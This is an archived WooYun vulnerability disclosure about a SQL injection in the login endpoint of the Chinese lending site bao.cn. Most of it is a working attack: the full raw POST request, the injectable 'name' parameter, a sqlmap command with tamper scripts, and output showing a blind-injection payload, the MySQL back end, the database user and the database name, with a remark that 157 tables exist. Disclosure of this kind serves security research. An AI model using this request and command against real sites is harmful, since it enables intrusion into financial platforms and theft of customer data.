乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-10: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-12-25: 厂商已经主动忽略漏洞,细节向公众公开
宝点网运作主要以互联网为载体,以先进的技术为支撑,以诚信为前提, 主要通过个人理财账户来实现运作。宝点网实行“一个账户,两种身份” 原则,将客户分为贷款人和理财人。
漏洞地址:
POST /ucenter/login/checkUser HTTP/1.1Content-Length: 136Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: https://www.bao.cn:443/Cookie: PHPSESSID=coeiqujoclndb0fjf54l8ilkn2; NoviceGuide=my+valueHost: www.bao.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*name=e&ps=e
注入参数是 name
sqlmap.py -r bao.txt --dbs --current-db --current-user --is-dba --tamper=space2comment,between --level 5 --risk 3 -p name
POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection point(s) with a total of 729 HTTP(s) requests:---Parameter: name (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: name=-8761")) OR 9759=9759#&ps=e---[10:59:59] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[10:59:59] [INFO] testing MySQL[11:00:04] [INFO] confirming MySQL[11:00:19] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.0[11:00:19] [INFO] fetching current user[11:00:19] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[11:00:19] [INFO] retrieved: zhang@%current user: 'zhang@%'[11:02:53] [INFO] fetching current database[11:02:53] [INFO] retrieved: newbao
数据库:
主库157个表 实在是太慢 不跑了T_T
参数过滤
未能联系到厂商或者厂商积极拒绝